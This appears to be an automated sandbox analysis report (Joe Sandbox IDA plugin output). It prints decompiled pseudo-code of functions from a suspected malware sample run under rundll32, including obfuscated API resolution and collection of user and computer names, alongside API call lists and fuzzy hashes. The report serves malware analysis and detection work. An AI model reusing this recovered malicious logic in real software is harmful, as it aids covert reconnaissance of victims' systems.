                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B44DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                      				intOrPtr _v8;
                                      				intOrPtr _t23;
                                      				intOrPtr _t26;
                                      				_Unknown_base(*)()* _t28;
                                      				intOrPtr _t30;
                                      				_Unknown_base(*)()* _t32;
                                      				intOrPtr _t33;
                                      				_Unknown_base(*)()* _t35;
                                      				intOrPtr _t36;
                                      				_Unknown_base(*)()* _t38;
                                      				intOrPtr _t39;
                                      				_Unknown_base(*)()* _t41;
                                      				intOrPtr _t44;
                                      				struct HINSTANCE__* _t48;
                                      				intOrPtr _t54;
                                      
                                      				_t54 = E044B6D63(0x20);
                                      				if(_t54 == 0) {
                                      					_v8 = 8;
                                      				} else {
                                      					_t23 =  *0x44ba348; // 0x9ad5a8
                                      					_t1 = _t23 + 0x44bb11a; // 0x4c44544e
                                      					_t48 = GetModuleHandleA(_t1);
                                      					_t26 =  *0x44ba348; // 0x9ad5a8
                                      					_t2 = _t26 + 0x44bb761; // 0x7243775a
                                      					_v8 = 0x7f;
                                      					_t28 = GetProcAddress(_t48, _t2);
                                      					 *(_t54 + 0xc) = _t28;
                                      					if(_t28 == 0) {
                                      						L8:
                                      						E044B6C2C(_t54);
                                      					} else {
                                      						_t30 =  *0x44ba348; // 0x9ad5a8
                                      						_t5 = _t30 + 0x44bb74e; // 0x614d775a
                                      						_t32 = GetProcAddress(_t48, _t5);
                                      						 *(_t54 + 0x10) = _t32;
                                      						if(_t32 == 0) {
                                      							goto L8;
                                      						} else {
                                      							_t33 =  *0x44ba348; // 0x9ad5a8
                                      							_t7 = _t33 + 0x44bb771; // 0x6e55775a
                                      							_t35 = GetProcAddress(_t48, _t7);
                                      							 *(_t54 + 0x14) = _t35;
                                      							if(_t35 == 0) {
                                      								goto L8;
                                      							} else {
                                      								_t36 =  *0x44ba348; // 0x9ad5a8
                                      								_t9 = _t36 + 0x44bb4ca; // 0x4e6c7452
                                      								_t38 = GetProcAddress(_t48, _t9);
                                      								 *(_t54 + 0x18) = _t38;
                                      								if(_t38 == 0) {
                                      									goto L8;
                                      								} else {
                                      									_t39 =  *0x44ba348; // 0x9ad5a8
                                      									_t11 = _t39 + 0x44bb786; // 0x6c43775a
                                      									_t41 = GetProcAddress(_t48, _t11);
                                      									 *(_t54 + 0x1c) = _t41;
                                      									if(_t41 == 0) {
                                      										goto L8;
                                      									} else {
                                      										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                      										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                      										_t44 = E044B190C(_t54, _a8);
                                      										_v8 = _t44;
                                      										if(_t44 != 0) {
                                      											goto L8;
                                      										} else {
                                      											 *_a12 = _t54;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v8;
                                      			}



















                                      APIs
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,044B4046,?,?,?,?,00000000,00000000), ref: 044B4503
                                      • GetProcAddress.KERNEL32(00000000,7243775A), ref: 044B4525
                                      • GetProcAddress.KERNEL32(00000000,614D775A), ref: 044B453B
                                      • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044B4551
                                      • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044B4567
                                      • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044B457D
                                        • Part of subcall function 044B190C: memset.NTDLL ref: 044B198B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$AllocateHandleHeapModulememset
                                      • String ID:
                                      • API String ID: 1886625739-0
                                      • Opcode ID: 24d475015bd9ed535fe350acfd23998bed55ed28fa8d3313b1485a76ffb0a084
                                      • Instruction ID: 1931f94cf631b3929aa4fac009b05ad8b51f82ba351da418cf1e7c12f01351b5
                                      • Opcode Fuzzy Hash: 24d475015bd9ed535fe350acfd23998bed55ed28fa8d3313b1485a76ffb0a084
                                      • Instruction Fuzzy Hash: 252121B1501B0A9FEB10DFA9C884E9B77FCEF446047018426EA85D7252DB74F9058BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                      			E044B3472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                      				signed int _v8;
                                      				char _v12;
                                      				signed int* _v16;
                                      				char _v284;
                                      				void* __esi;
                                      				char* _t59;
                                      				intOrPtr* _t60;
                                      				intOrPtr _t64;
                                      				char _t65;
                                      				intOrPtr _t68;
                                      				intOrPtr _t69;
                                      				intOrPtr _t71;
                                      				void* _t73;
                                      				signed int _t81;
                                      				void* _t91;
                                      				void* _t92;
                                      				char _t98;
                                      				signed int* _t100;
                                      				intOrPtr* _t101;
                                      				void* _t102;
                                      
                                      				_t92 = __ecx;
                                      				_v8 = _v8 & 0x00000000;
                                      				_t98 = _a16;
                                      				if(_t98 == 0) {
                                      					__imp__( &_v284,  *0x44ba3dc);
                                      					_t91 = 0x80000002;
                                      					L6:
                                      					_t59 = E044B61FC( &_v284,  &_v284);
                                      					_a8 = _t59;
                                      					if(_t59 == 0) {
                                      						_v8 = 8;
                                      						L29:
                                      						_t60 = _a20;
                                      						if(_t60 != 0) {
                                      							 *_t60 =  *_t60 + 1;
                                      						}
                                      						return _v8;
                                      					}
                                      					_t101 = _a24;
                                      					if(E044B6F28(_t92, _t97, _t101, _t91, _t59) != 0) {
                                      						L27:
                                      						E044B6C2C(_a8);
                                      						goto L29;
                                      					}
                                      					_t64 =  *0x44ba318; // 0x4e69d70
                                      					_t16 = _t64 + 0xc; // 0x4e69e92
                                      					_t65 = E044B61FC(_t64,  *_t16);
                                      					_a24 = _t65;
                                      					if(_t65 == 0) {
                                      						L14:
                                      						_t29 = _t101 + 0x14; // 0x102
                                      						_t33 = _t101 + 0x10; // 0x3d044b90
                                      						if(E044B4822(_t97,  *_t33, _t91, _a8,  *0x44ba3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                      							_t68 =  *0x44ba348; // 0x9ad5a8
                                      							if(_t98 == 0) {
                                      								_t35 = _t68 + 0x44bba4c; // 0x4d4c4b48
                                      								_t69 = _t35;
                                      							} else {
                                      								_t34 = _t68 + 0x44bba47; // 0x55434b48
                                      								_t69 = _t34;
                                      							}
                                      							if(E044B62F6(_t69,  *0x44ba3d4,  *0x44ba3d8,  &_a24,  &_a16) == 0) {
                                      								if(_t98 == 0) {
                                      									_t71 =  *0x44ba348; // 0x9ad5a8
                                      									_t44 = _t71 + 0x44bb842; // 0x74666f53
                                      									_t73 = E044B61FC(_t44, _t44);
                                      									_t99 = _t73;
                                      									if(_t73 == 0) {
                                      										_v8 = 8;
                                      									} else {
                                      										_t47 = _t101 + 0x10; // 0x3d044b90
                                      										E044B74B6( *_t47, _t91, _a8,  *0x44ba3d8, _a24);
                                      										_t49 = _t101 + 0x10; // 0x3d044b90
                                      										E044B74B6( *_t49, _t91, _t99,  *0x44ba3d0, _a16);
                                      										E044B6C2C(_t99);
                                      									}
                                      								} else {
                                      									_t40 = _t101 + 0x10; // 0x3d044b90
                                      									E044B74B6( *_t40, _t91, _a8,  *0x44ba3d8, _a24);
                                      									_t43 = _t101 + 0x10; // 0x3d044b90
                                      									E044B74B6( *_t43, _t91, _a8,  *0x44ba3d0, _a16);
                                      								}
                                      								if( *_t101 != 0) {
                                      									E044B6C2C(_a24);
                                      								} else {
                                      									 *_t101 = _a16;
                                      								}
                                      							}
                                      						}
                                      						goto L27;
                                      					}
                                      					_t21 = _t101 + 0x10; // 0x3d044b90
                                      					_t81 = E044B12CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                      					if(_t81 == 0) {
                                      						_t100 = _v16;
                                      						if(_v12 == 0x28) {
                                      							 *_t100 =  *_t100 & _t81;
                                      							_t26 = _t101 + 0x10; // 0x3d044b90
                                      							E044B4822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                      						}
                                      						E044B6C2C(_t100);
                                      						_t98 = _a16;
                                      					}
                                      					E044B6C2C(_a24);
                                      					goto L14;
                                      				}
                                      				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                      					goto L29;
                                      				} else {
                                      					_t97 = _a8;
                                      					E044B7A1E(_t98, _a8,  &_v284);
                                      					__imp__(_t102 + _t98 - 0x117,  *0x44ba3dc);
                                      					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                      					_t91 = 0x80000003;
                                      					goto L6;
                                      				}
                                      			}
























                                      APIs
                                      • StrChrA.SHLWAPI(044B7168,0000005F,00000000,00000000,00000104), ref: 044B34A5
                                      • lstrcpy.KERNEL32(?,?), ref: 044B34D2
                                        • Part of subcall function 044B61FC: lstrlen.KERNEL32(?,00000000,04E69D70,00000000,044B39E8,04E69F93,69B25F44,?,?,?,?,69B25F44,00000005,044BA00C,4D283A53,?), ref: 044B6203
                                        • Part of subcall function 044B61FC: mbstowcs.NTDLL ref: 044B622C
                                        • Part of subcall function 044B61FC: memset.NTDLL ref: 044B623E
                                        • Part of subcall function 044B74B6: lstrlenW.KERNEL32(?,?,?,044B363B,3D044B90,80000002,044B7168,044B7283,74666F53,4D4C4B48,044B7283,?,3D044B90,80000002,044B7168,?), ref: 044B74DB
                                        • Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38
                                      • lstrcpy.KERNEL32(?,00000000), ref: 044B34F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                      • String ID: ($\
                                      • API String ID: 3924217599-1512714803
                                      • Opcode ID: bb13993c40bd9bcdc526065b1693eef3b1e9c0be0c00ab33bf59282c4b015893
                                      • Instruction ID: 20a239fb728e252939495ae9a823599f1d1d883952f3fc37350e4e5b3eb3bb78
                                      • Opcode Fuzzy Hash: bb13993c40bd9bcdc526065b1693eef3b1e9c0be0c00ab33bf59282c4b015893
                                      • Instruction Fuzzy Hash: 52515E71500209EFEF219FA5DC40EDA3BB9EF08344F00851AFD9596261DB35ED25ABA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B2A11() {
                                      				long _v8;
                                      				long _v12;
                                      				int _v16;
                                      				long _t39;
                                      				long _t43;
                                      				signed int _t47;
                                      				short _t51;
                                      				signed int _t52;
                                      				int _t56;
                                      				int _t57;
                                      				char* _t64;
                                      				short* _t67;
                                      
                                      				_v16 = 0;
                                      				_v8 = 0;
                                      				GetUserNameW(0,  &_v8);
                                      				_t39 = _v8;
                                      				if(_t39 != 0) {
                                      					_v12 = _t39;
                                      					_v8 = 0;
                                      					GetComputerNameW(0,  &_v8);
                                      					_t43 = _v8;
                                      					if(_t43 != 0) {
                                      						_t11 = _t43 + 2; // 0x7477c742
                                      						_v12 = _v12 + _t11;
                                      						_t64 = E044B6D63(_v12 + _t11 << 2);
                                      						if(_t64 != 0) {
                                      							_t47 = _v12;
                                      							_t67 = _t64 + _t47 * 2;
                                      							_v8 = _t47;
                                      							if(GetUserNameW(_t67,  &_v8) == 0) {
                                      								L7:
                                      								E044B6C2C(_t64);
                                      							} else {
                                      								_t51 = 0x40;
                                      								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                      								_t52 = _v8;
                                      								_v12 = _v12 - _t52;
                                      								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                      									goto L7;
                                      								} else {
                                      									_t56 = _v12 + _v8;
                                      									_t31 = _t56 + 2; // 0x44b57e9
                                      									_v12 = _t56;
                                      									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                      									_v8 = _t57;
                                      									if(_t57 == 0) {
                                      										goto L7;
                                      									} else {
                                      										_t64[_t57] = 0;
                                      										_v16 = _t64;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _v16;
                                      			}


                                      APIs
                                      • GetUserNameW.ADVAPI32(00000000,044B57E7), ref: 044B2A25
                                      • GetComputerNameW.KERNEL32(00000000,044B57E7), ref: 044B2A41
                                        • Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F
                                      • GetUserNameW.ADVAPI32(00000000,044B57E7), ref: 044B2A7B
                                      • GetComputerNameW.KERNEL32(044B57E7,7477C740), ref: 044B2A9E
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,044B57E7,00000000,044B57E9,00000000,00000000,?,7477C740,044B57E7), ref: 044B2AC1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                      • String ID:
                                      • API String ID: 3850880919-0
                                      • Opcode ID: 5c68bbb3c2c43ed028b0b012edb50fff616d21abe06f6af63f704890ea2d06e4
                                      • Instruction ID: 538ed2d0afd3663d3fb2c74d5e1e7581211e1830b817f0f162f1fdb6a0de0aea
                                      • Opcode Fuzzy Hash: 5c68bbb3c2c43ed028b0b012edb50fff616d21abe06f6af63f704890ea2d06e4
                                      • Instruction Fuzzy Hash: CC21EC76900108FFDF21DFE5D9889EEBBB8FF48740B5044AAE501E7241E674AB45DBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E044B6D78(intOrPtr _a4) {
                                      				void* _t2;
                                      				unsigned int _t4;
                                      				void* _t5;
                                      				long _t6;
                                      				void* _t7;
                                      				void* _t15;
                                      
                                      				_t2 = CreateEventA(0, 1, 0, 0);
                                      				 *0x44ba30c = _t2;
                                      				if(_t2 == 0) {
                                      					return GetLastError();
                                      				}
                                      				_t4 = GetVersion();
                                      				if(_t4 != 5) {
                                      					L4:
                                      					if(_t15 <= 0) {
                                      						_t5 = 0x32;
                                      						return _t5;
                                      					}
                                      					L5:
                                      					 *0x44ba2fc = _t4;
                                      					_t6 = GetCurrentProcessId();
                                      					 *0x44ba2f8 = _t6;
                                      					 *0x44ba304 = _a4;
                                      					_t7 = OpenProcess(0x10047a, 0, _t6);
                                      					 *0x44ba2f4 = _t7;
                                      					if(_t7 == 0) {
                                      						 *0x44ba2f4 =  *0x44ba2f4 | 0xffffffff;
                                      					}
                                      					return 0;
                                      				}
                                      				if(_t4 >> 8 > 0) {
                                      					goto L5;
                                      				}
                                      				_t15 = _t4 - _t4;
                                      				goto L4;
                                      			}


                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,044B1D07,?), ref: 044B6D80
                                      • GetVersion.KERNEL32 ref: 044B6D8F
                                      • GetCurrentProcessId.KERNEL32 ref: 044B6DAB
                                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 044B6DC8
                                      • GetLastError.KERNEL32 ref: 044B6DE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                      • String ID:
                                      • API String ID: 2270775618-0
                                      • Opcode ID: d85e668e5687fe264543f431df1a226051007c352275fd5137c6c08945c67c09
                                      • Instruction ID: 167e6f1fd4c0f10430bc0d0996ce8c8c5988b37c8125c6e96405bdb9127f2fcb
                                      • Opcode Fuzzy Hash: d85e668e5687fe264543f431df1a226051007c352275fd5137c6c08945c67c09
                                      • Instruction Fuzzy Hash: 6FF0C2B07403029BFF648F34A909B957BA4EB45701F11441AE692D63C0DB7EA841CBE6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 46%
                                      			E044B2732(intOrPtr* __eax) {
                                      				void* _v8;
                                      				WCHAR* _v12;
                                      				void* _v16;
                                      				char _v20;
                                      				void* _v24;
                                      				intOrPtr _v28;
                                      				void* _v32;
                                      				intOrPtr _v40;
                                      				short _v48;
                                      				intOrPtr _v56;
                                      				short _v64;
                                      				intOrPtr* _t54;
                                      				intOrPtr* _t56;
                                      				intOrPtr _t57;
                                      				intOrPtr* _t58;
                                      				intOrPtr* _t60;
                                      				void* _t61;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t65;
                                      				short _t67;
                                      				intOrPtr* _t68;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t72;
                                      				intOrPtr* _t75;
                                      				intOrPtr* _t77;
                                      				intOrPtr _t79;
                                      				intOrPtr* _t83;
                                      				intOrPtr* _t87;
                                      				intOrPtr _t103;
                                      				intOrPtr _t109;
                                      				void* _t118;
                                      				void* _t122;
                                      				void* _t123;
                                      				intOrPtr _t130;
                                      
                                      				_t123 = _t122 - 0x3c;
                                      				_push( &_v8);
                                      				_push(__eax);
                                      				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                      				if(_t118 >= 0) {
                                      					_t54 = _v8;
                                      					_t103 =  *0x44ba348; // 0x9ad5a8
                                      					_t5 = _t103 + 0x44bb038; // 0x3050f485
                                      					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                      					_t56 = _v8;
                                      					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                      					if(_t118 >= 0) {
                                      						__imp__#2(0x44b9290);
                                      						_v28 = _t57;
                                      						if(_t57 == 0) {
                                      							_t118 = 0x8007000e;
                                      						} else {
                                      							_t60 = _v32;
                                      							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                      							_t87 = __imp__#6;
                                      							_t118 = _t61;
                                      							if(_t118 >= 0) {
                                      								_t63 = _v24;
                                      								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                      								if(_t118 >= 0) {
                                      									_t130 = _v20;
                                      									if(_t130 != 0) {
                                      										_t67 = 3;
                                      										_v64 = _t67;
                                      										_v48 = _t67;
                                      										_v56 = 0;
                                      										_v40 = 0;
                                      										if(_t130 > 0) {
                                      											while(1) {
                                      												_t68 = _v24;
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												_t123 = _t123;
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												asm("movsd");
                                      												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                      												if(_t118 < 0) {
                                      													goto L16;
                                      												}
                                      												_t70 = _v8;
                                      												_t109 =  *0x44ba348; // 0x9ad5a8
                                      												_t28 = _t109 + 0x44bb0bc; // 0x3050f1ff
                                      												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                      												if(_t118 >= 0) {
                                      													_t75 = _v16;
                                      													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                      													if(_t118 >= 0 && _v12 != 0) {
                                      														_t79 =  *0x44ba348; // 0x9ad5a8
                                      														_t33 = _t79 + 0x44bb078; // 0x76006f
                                      														if(lstrcmpW(_v12, _t33) == 0) {
                                      															_t83 = _v16;
                                      															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                      														}
                                      														 *_t87(_v12);
                                      													}
                                      													_t77 = _v16;
                                      													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                      												}
                                      												_t72 = _v8;
                                      												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                      												_v40 = _v40 + 1;
                                      												if(_v40 < _v20) {
                                      													continue;
                                      												}
                                      												goto L16;
                                      											}
                                      										}
                                      									}
                                      								}
                                      								L16:
                                      								_t65 = _v24;
                                      								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                      							}
                                      							 *_t87(_v28);
                                      						}
                                      						_t58 = _v32;
                                      						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                      					}
                                      				}
                                      				return _t118;
                                      			}


                                      APIs
                                      • SysAllocString.OLEAUT32(044B9290), ref: 044B2782
                                      • lstrcmpW.KERNEL32(00000000,0076006F), ref: 044B2863
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B287C
                                      • SysFreeString.OLEAUT32(?), ref: 044B28AB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$Free$Alloclstrcmp
                                      • String ID:
                                      • API String ID: 1885612795-0
                                      • Opcode ID: d04b34acc16465359e225a7d0cf1a5783294a807eb42f26efbe5104d72edc5d3
                                      • Instruction ID: c4219c77b2576f19a2037fb9486059f814f713fee93824894dd8b8e12a2681e2
                                      • Opcode Fuzzy Hash: d04b34acc16465359e225a7d0cf1a5783294a807eb42f26efbe5104d72edc5d3
                                      • Instruction Fuzzy Hash: 44512A75D00A19EFCF00DBE8C8889EEB7B9FF89700B144699E955EB214D771AD41CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysAllocString.OLEAUT32(?), ref: 044B5BD8
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B5CBD
                                        • Part of subcall function 044B2732: SysAllocString.OLEAUT32(044B9290), ref: 044B2782
                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 044B5D10
                                      • SysFreeString.OLEAUT32(00000000), ref: 044B5D1F
                                        • Part of subcall function 044B3A62: Sleep.KERNEL32(000001F4), ref: 044B3AAA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                      • Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree$ArrayDestroySafeSleep
                                      • String ID:
                                      • API String ID: 3193056040-0
                                      • Opcode ID: 8db3c42be5b81a61510a2aec517f985250913699de27db12a4d7f19ce54cac5d
                                      • Instruction ID: a5e8802c969244e3315fcfbcf67b20d6480168beeaf106ba2a78cd8ded94377e
                                      • Opcode Fuzzy Hash: 8db3c42be5b81a61510a2aec517f985250913699de27db12a4d7f19ce54cac5d
                                      • Instruction Fuzzy Hash: 9B512A75500609AFDB01CFA9D844ADEB7BAFF88704F158429E945DB220DB75ED05CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E044B1DE3(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				void _v156;
                                      				void _v428;
                                      				void* _t55;
                                      				unsigned int _t56;
                                      				signed int _t66;
                                      				signed int _t74;
                                      				void* _t76;
                                      				signed int _t79;
                                      				void* _t81;
                                      				void* _t92;
                                      				void* _t96;
                                      				signed int* _t99;
                                      				signed int _t101;
                                      				signed int _t103;
                                      				void* _t107;
                                      
                                      				_t92 = _a12;
                                      				_t101 = __eax;
                                      				_t55 = E044B2FAB(_a16, _t92);
                                      				_t79 = _t55;
                                      				if(_t79 == 0) {
                                      					L18:
                                      					return _t55;
                                      				}
                                      				_t56 =  *(_t92 + _t79 * 4 - 4);
                                      				_t81 = 0;
                                      				_t96 = 0x20;
                                      				if(_t56 == 0) {
                                      					L4:
                                      					_t97 = _t96 - _t81;
                                      					_v12 = _t96 - _t81;
                                      					E044B1CC1(_t79,  &_v428);
                                      					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E044B2920(_t101,  &_v428, _a8, _t96 - _t81);
                                      					E044B2920(_t79,  &_v156, _a12, _t97);
                                      					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                      					_t66 = E044B1CC1(_t101, 0x44ba1d0);
                                      					_t103 = _t101 - _t79;
                                      					_a8 = _t103;
                                      					if(_t103 < 0) {
                                      						L17:
                                      						E044B1CC1(_a16, _a4);
                                      						E044B3ADA(_t79,  &_v428, _a4, _t97);
                                      						memset( &_v428, 0, 0x10c);
                                      						_t55 = memset( &_v156, 0, 0x84);
                                      						goto L18;
                                      					}
                                      					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                      					do {
                                      						if(_v8 != 0xffffffff) {
                                      							_push(1);
                                      							_push(0);
                                      							_push(0);
                                      							_push( *_t99);
                                      							L044B824A();
                                      							_t74 = _t66 +  *(_t99 - 4);
                                      							asm("adc edx, esi");
                                      							_push(0);
                                      							_push(_v8 + 1);
                                      							_push(_t92);
                                      							_push(_t74);
                                      							L044B8244();
                                      							if(_t92 > 0 || _t74 > 0xffffffff) {
                                      								_t74 = _t74 | 0xffffffff;
                                      								_v16 = _v16 & 0x00000000;
                                      							}
                                      						} else {
                                      							_t74 =  *_t99;
                                      						}
                                      						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                      						_a12 = _t74;
                                      						_t76 = E044B241B(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                      						while(1) {
                                      							 *_t99 =  *_t99 - _t76;
                                      							if( *_t99 != 0) {
                                      								goto L14;
                                      							}
                                      							L13:
                                      							_t92 =  &_v156;
                                      							if(E044B2378(_t79, _t92, _t106) < 0) {
                                      								break;
                                      							}
                                      							L14:
                                      							_a12 = _a12 + 1;
                                      							_t76 = E044B79CC(_t79,  &_v156, _t106, _t106);
                                      							 *_t99 =  *_t99 - _t76;
                                      							if( *_t99 != 0) {
                                      								goto L14;
                                      							}
                                      							goto L13;
                                      						}
                                      						_a8 = _a8 - 1;
                                      						_t66 = _a12;
                                      						_t99 = _t99 - 4;
                                      						 *(0x44ba1d0 + _a8 * 4) = _t66;
                                      					} while (_a8 >= 0);
                                      					_t97 = _v12;
                                      					goto L17;
                                      				}
                                      				while(_t81 < _t96) {
                                      					_t81 = _t81 + 1;
                                      					_t56 = _t56 >> 1;
                                      					if(_t56 != 0) {
                                      						continue;
                                      					}
                                      					goto L4;
                                      				}
                                      				goto L4;
                                      			}


                                      APIs
                                      • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 044B1E96
                                      • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 044B1EAC
                                      • memset.NTDLL ref: 044B1F55
                                      • memset.NTDLL ref: 044B1F6B
                                      Memory Dump Source
